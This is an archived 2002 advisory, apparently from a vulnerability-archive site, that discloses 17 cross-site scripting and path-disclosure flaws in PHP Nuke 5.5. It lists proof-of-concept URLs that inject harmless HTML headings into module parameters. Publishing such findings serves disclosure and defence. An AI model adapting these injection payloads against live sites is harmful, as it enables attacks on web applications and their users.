php.nuke.cross-site.txt

php.nuke.cross-site.txt: Posted Apr 25, 2002; Authored by Rodrigo Gutierrez | Site trustix.com; PHP Nuke v5.5 contains 8 new and 9 old cross site scripting vulnerabilities.; tags | php, vulnerability, xss; SHA-256 | 173016f49f065ea15a0ca8293cbecbab43159ab44acc35b53ecd704c5c82556a; Download | Favorite | View

php.nuke.cross-site.txt

Cross site scripting is a serious problem, (even if some people
doesn't believe it), On this second round i'll show 8 new XSS
vulnerabilities in PHP Nuke (most of them are also path disclosure
vulns):

http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E
http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75
http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20
http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge
http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E


That in Addition to the 9 i mentioned last week on my posting to
vuln-dev:

http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload
http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here
http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E


I would like to mention that i couldn't find any contact information
on phpnuke's website (without registering as a user).



Best Regards

-- 
/*
Rodrigo Gutierrez                              +47 73546339
rodrigo@trustix.com             +47 98060198
Trustix AS                           http://www.trustix.com
*/

Top Authors In Last 30 Days

Red Hat 328 files
Ubuntu 56 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
nu11secur1ty 5 files
Google Security Research 4 files
Jann Horn 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,047)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,790)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,914)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,521)
UNIX (9,404)
UnixWare (187)
Windows (6,660)
Other

php.nuke.cross-site.txt

php.nuke.cross-site.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

php.nuke.cross-site.txt

Share This

php.nuke.cross-site.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems